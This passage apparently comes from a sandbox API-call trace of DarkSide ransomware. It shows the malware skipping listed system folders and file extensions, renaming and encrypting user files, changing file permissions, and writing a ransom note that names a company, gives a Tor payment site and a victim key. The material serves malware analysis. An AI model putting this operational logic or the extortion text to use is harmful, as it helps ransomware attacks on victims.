HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" [0159.022] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 0x47 [0159.022] wcscpy (in: _Dest=0x32500f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.022] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.c06622a1"), dwFlags=0x8) returned 1 [0159.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b4 [0159.024] CreateIoCompletionPort (FileHandle=0x1b4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.024] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0159.031] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4934f22a [0159.031] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x697955e6 [0159.031] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d90bc1e [0159.031] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b8a80ba [0159.031] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x133f7244 [0159.031] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b2e1b31 [0159.031] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3662c8bf [0159.031] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x221e9bf5 [0159.034] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xe715c89f [0159.034] RtlComputeCrc32 (PartialCrc=0xc89f, Buffer=0x2690094, Length=0x80) returned 0x14529440 [0159.034] RtlComputeCrc32 (PartialCrc=0x9440, Buffer=0x2690094, Length=0x80) returned 0x7efa573c [0159.034] RtlComputeCrc32 (PartialCrc=0x573c, Buffer=0x2690094, Length=0x80) returned 0xba9debc7 [0159.034] RtlComputeCrc32 (PartialCrc=0xebc7, Buffer=0x2690094, Length=0x80) returned 0x72b94e56 [0159.034] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.034] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.034] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.034] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.034] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0159.034] _wcsicmp (_Str1="backup", _Str2="Links") returned -10 [0159.034] wcslen (_String="backup") returned 0x6 [0159.034] _wcsicmp (_Str1="bak", _Str2="Links") returned -10 [0159.035] wcslen (_String="bak") returned 0x3 [0159.035] _wcsicmp (_Str1="back", _Str2="Links") returned -10 [0159.035] wcslen (_String="back") returned 0x4 [0159.035] _wcsicmp (_Str1="archive", _Str2="Links") returned -11 [0159.035] wcslen (_String="archive") returned 0x7 [0159.035] _wcsicmp (_Str1="bckp", _Str2="Links") returned -10 [0159.035] wcslen (_String="bckp") returned 0x4 [0159.035] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.036] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.037] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0159.037] _wcsicmp (_Str1="$recycle.bin", _Str2="Microsoft Websites") returned -73 [0159.037] wcslen (_String="$recycle.bin") returned 0xc [0159.037] _wcsicmp (_Str1="config.msi", _Str2="Microsoft Websites") returned -10 [0159.037] wcslen (_String="config.msi") returned 0xa [0159.037] _wcsicmp (_Str1="$windows.~bt", _Str2="Microsoft Websites") returned -73 [0159.037] wcslen (_String="$windows.~bt") returned 0xc [0159.037] _wcsicmp (_Str1="$windows.~ws", _Str2="Microsoft Websites") returned -73 [0159.037] wcslen (_String="$windows.~ws") returned 0xc [0159.037] _wcsicmp (_Str1="windows", _Str2="Microsoft Websites") returned 10 [0159.037] wcslen (_String="windows") returned 0x7 [0159.037] _wcsicmp (_Str1="appdata", _Str2="Microsoft Websites") returned -12 [0159.037] wcslen (_String="appdata") returned 0x7 [0159.037] _wcsicmp (_Str1="application data", _Str2="Microsoft Websites") returned -12 [0159.037] wcslen (_String="application data") returned 0x10 [0159.037] _wcsicmp (_Str1="boot", _Str2="Microsoft Websites") returned -11 [0159.037] wcslen (_String="boot") returned 0x4 [0159.037] _wcsicmp (_Str1="google", _Str2="Microsoft Websites") returned -6 [0159.037] wcslen (_String="google") returned 0x6 [0159.038] _wcsicmp (_Str1="mozilla", _Str2="Microsoft Websites") returned 6 [0159.038] wcslen (_String="mozilla") returned 0x7 [0159.038] _wcsicmp (_Str1="program files", _Str2="Microsoft Websites") returned 3 [0159.038] wcslen (_String="program files") returned 0xd [0159.038] _wcsicmp (_Str1="program files (x86)", _Str2="Microsoft Websites") returned 3 [0159.038] wcslen (_String="program files (x86)") returned 0x13 [0159.038] _wcsicmp (_Str1="programdata", _Str2="Microsoft Websites") returned 3 [0159.038] wcslen (_String="programdata") returned 0xb [0159.038] _wcsicmp (_Str1="system volume information", _Str2="Microsoft Websites") returned 6 [0159.038] wcslen (_String="system volume information") returned 0x19 [0159.038] _wcsicmp (_Str1="tor browser", _Str2="Microsoft Websites") returned 7 [0159.038] wcslen (_String="tor browser") returned 0xb [0159.038] _wcsicmp (_Str1="windows.old", _Str2="Microsoft Websites") returned 10 [0159.038] wcslen (_String="windows.old") returned 0xb [0159.038] _wcsicmp (_Str1="intel", _Str2="Microsoft Websites") returned -4 [0159.038] wcslen (_String="intel") returned 0x5 [0159.038] _wcsicmp (_Str1="msocache", _Str2="Microsoft Websites") returned 10 [0159.038] wcslen (_String="msocache") returned 0x8 [0159.038] _wcsicmp (_Str1="perflogs", _Str2="Microsoft Websites") returned 3 [0159.038] wcslen (_String="perflogs") returned 0x8 [0159.038] _wcsicmp (_Str1="x64dbg", _Str2="Microsoft Websites") returned 11 [0159.038] wcslen (_String="x64dbg") returned 0x6 [0159.038] _wcsicmp (_Str1="public", _Str2="Microsoft Websites") returned 3 [0159.038] wcslen (_String="public") returned 0x6 [0159.038] _wcsicmp (_Str1="all users", _Str2="Microsoft Websites") returned -12 [0159.038] wcslen (_String="all users") returned 0x9 [0159.038] _wcsicmp (_Str1="default", _Str2="Microsoft Websites") returned -9 [0159.038] wcslen (_String="default") returned 0x7 [0159.038] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0159.038] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 0x2d [0159.038] wcscpy (in: _Dest=0x208e78, _Source="Microsoft Websites" | out: _Dest="Microsoft Websites") returned="Microsoft Websites" [0159.038] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.038] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.039] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0159.039] GetNamedSecurityInfoW () returned 0x0 [0159.039] SetEntriesInAclW () returned 0x0 [0159.039] SetNamedSecurityInfoW () returned 0x0 [0159.043] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b488) returned 1 [0159.043] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.043] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 1 [0159.043] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.043] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0159.043] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.044] CloseHandle (hObject=0x1a4) returned 1 [0159.045] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0159.045] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="" [0159.045] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 0x3f [0159.045] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0159.045] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8c7f0500, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c7f0500, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.046] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0159.046] _wcsicmp (_Str1="IE Add-on site.url", _Str2="README.c06622a1.TXT") returned -9 [0159.046] wcsstr (_Str="IE Add-on site.url", _SubStr="README") returned 0x0 [0159.046] _wcsicmp (_Str1="autorun.inf", _Str2="IE Add-on site.url") returned -8 [0159.046] wcslen (_String="autorun.inf") returned 0xb [0159.046] _wcsicmp (_Str1="boot.ini", _Str2="IE Add-on site.url") returned -7 [0159.046] wcslen (_String="boot.ini") returned 0x8 [0159.046] _wcsicmp (_Str1="bootfont.bin", _Str2="IE Add-on site.url") returned -7 [0159.046] wcslen (_String="bootfont.bin") returned 0xc [0159.046] _wcsicmp (_Str1="bootsect.bak", _Str2="IE Add-on site.url") returned -7 [0159.046] wcslen (_String="bootsect.bak") returned 0xc [0159.046] _wcsicmp (_Str1="desktop.ini", _Str2="IE Add-on site.url") returned -5 [0159.046] wcslen (_String="desktop.ini") returned 0xb [0159.046] _wcsicmp (_Str1="iconcache.db", _Str2="IE Add-on site.url") returned -2 [0159.046] wcslen (_String="iconcache.db") returned 0xc [0159.046] _wcsicmp (_Str1="ntldr", _Str2="IE Add-on site.url") returned 5 [0159.046] wcslen (_String="ntldr") returned 0x5 [0159.046] _wcsicmp (_Str1="ntuser.dat", _Str2="IE Add-on site.url") returned 5 [0159.046] wcslen (_String="ntuser.dat") returned 0xa [0159.046] _wcsicmp (_Str1="ntuser.dat.log", _Str2="IE Add-on site.url") returned 5 [0159.046] wcslen (_String="ntuser.dat.log") returned 0xe [0159.046] _wcsicmp (_Str1="ntuser.ini", _Str2="IE Add-on site.url") returned 5 [0159.046] wcslen (_String="ntuser.ini") returned 0xa [0159.046] _wcsicmp (_Str1="thumbs.db", _Str2="IE Add-on site.url") returned 11 [0159.046] wcslen (_String="thumbs.db") returned 0x9 [0159.046] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.046] wcslen (_String="386") returned 0x3 [0159.046] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.046] wcslen (_String="adv") returned 0x3 [0159.046] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.046] wcslen (_String="ani") returned 0x3 [0159.047] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.047] wcslen (_String="bat") returned 0x3 [0159.047] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.047] wcslen (_String="bin") returned 0x3 [0159.047] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.047] wcslen (_String="cab") returned 0x3 [0159.047] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.047] wcslen (_String="cmd") returned 0x3 [0159.047] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.047] wcslen (_String="com") returned 0x3 [0159.047] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.047] wcslen (_String="cpl") returned 0x3 [0159.047] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.047] wcslen (_String="cur") returned 0x3 [0159.047] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.047] wcslen (_String="deskthemepack") returned 0xd [0159.047] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.047] wcslen (_String="diagcab") returned 0x7 [0159.047] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.047] wcslen (_String="diagcfg") returned 0x7 [0159.047] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.047] wcslen (_String="diagpkg") returned 0x7 [0159.047] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.047] wcslen (_String="dll") returned 0x3 [0159.047] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.047] wcslen (_String="drv") returned 0x3 [0159.047] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.047] wcslen (_String="exe") returned 0x3 [0159.047] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.047] wcslen (_String="hlp") returned 0x3 [0159.047] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.047] wcslen (_String="icl") returned 0x3 [0159.047] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.047] wcslen (_String="icns") returned 0x4 [0159.047] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.048] wcslen (_String="ico") returned 0x3 [0159.048] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.048] wcslen (_String="ics") returned 0x3 [0159.048] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.048] wcslen (_String="idx") returned 0x3 [0159.048] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.048] wcslen (_String="ldf") returned 0x3 [0159.048] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.048] wcslen (_String="lnk") returned 0x3 [0159.048] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.048] wcslen (_String="mod") returned 0x3 [0159.048] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.048] wcslen (_String="mpa") returned 0x3 [0159.048] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.048] wcslen (_String="msc") returned 0x3 [0159.048] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.048] wcslen (_String="msp") returned 0x3 [0159.048] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.048] wcslen (_String="msstyles") returned 0x8 [0159.048] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.048] wcslen (_String="msu") returned 0x3 [0159.048] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.048] wcslen (_String="nls") returned 0x3 [0159.048] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.048] wcslen (_String="nomedia") returned 0x7 [0159.048] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.048] wcslen (_String="ocx") returned 0x3 [0159.048] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.048] wcslen (_String="prf") returned 0x3 [0159.048] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.048] wcslen (_String="ps1") returned 0x3 [0159.048] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.048] wcslen (_String="rom") returned 0x3 [0159.048] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.048] wcslen (_String="rtp") returned 0x3 [0159.049] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.049] wcslen (_String="scr") returned 0x3 [0159.049] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.049] wcslen (_String="shs") returned 0x3 [0159.049] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.049] wcslen (_String="spl") returned 0x3 [0159.049] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.049] wcslen (_String="sys") returned 0x3 [0159.049] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.049] wcslen (_String="theme") returned 0x5 [0159.049] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.049] wcslen (_String="themepack") returned 0x9 [0159.049] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.049] wcslen (_String="wpx") returned 0x3 [0159.049] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.049] wcslen (_String="lock") returned 0x4 [0159.049] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.049] wcslen (_String="key") returned 0x3 [0159.049] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.049] wcslen (_String="hta") returned 0x3 [0159.049] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.049] wcslen (_String="msi") returned 0x3 [0159.049] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.049] wcslen (_String="pdb") returned 0x3 [0159.049] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.049] wcslen (_String="sqlite") returned 0x6 [0159.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0159.049] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.049] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0159.049] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0159.049] wcscpy (in: _Dest=0x32400de, _Source="IE Add-on site.url" | out: _Dest="IE Add-on site.url") returned="IE Add-on site.url" [0159.050] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x80) returned 1 [0159.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0159.050] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.050] CloseHandle (hObject=0x194) returned 1 [0159.050] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.050] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0159.050] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 0x51 [0159.050] wcscpy (in: _Dest=0x325010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.050] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.c06622a1"), dwFlags=0x8) returned 1 [0159.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0159.054] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.054] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0159.062] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ff7718c [0159.063] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x41d2de34 [0159.063] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2004ed19 [0159.063] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46e2f972 [0159.063] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57b5c973 [0159.063] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2dcd96ab [0159.063] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x212fa66 [0159.063] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x338dc59 [0159.066] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x37582aaf [0159.066] RtlComputeCrc32 (PartialCrc=0x2aaf, Buffer=0x2b70094, Length=0x80) returned 0x5f5a0d7 [0159.066] RtlComputeCrc32 (PartialCrc=0xa0d7, Buffer=0x2b70094, Length=0x80) returned 0xe4387d17 [0159.066] RtlComputeCrc32 (PartialCrc=0x7d17, Buffer=0x2b70094, Length=0x80) returned 0xbe14b312 [0159.066] RtlComputeCrc32 (PartialCrc=0xb312, Buffer=0x2b70094, Length=0x80) returned 0xb05ddcda [0159.066] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.066] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.066] RtlFreeHeap 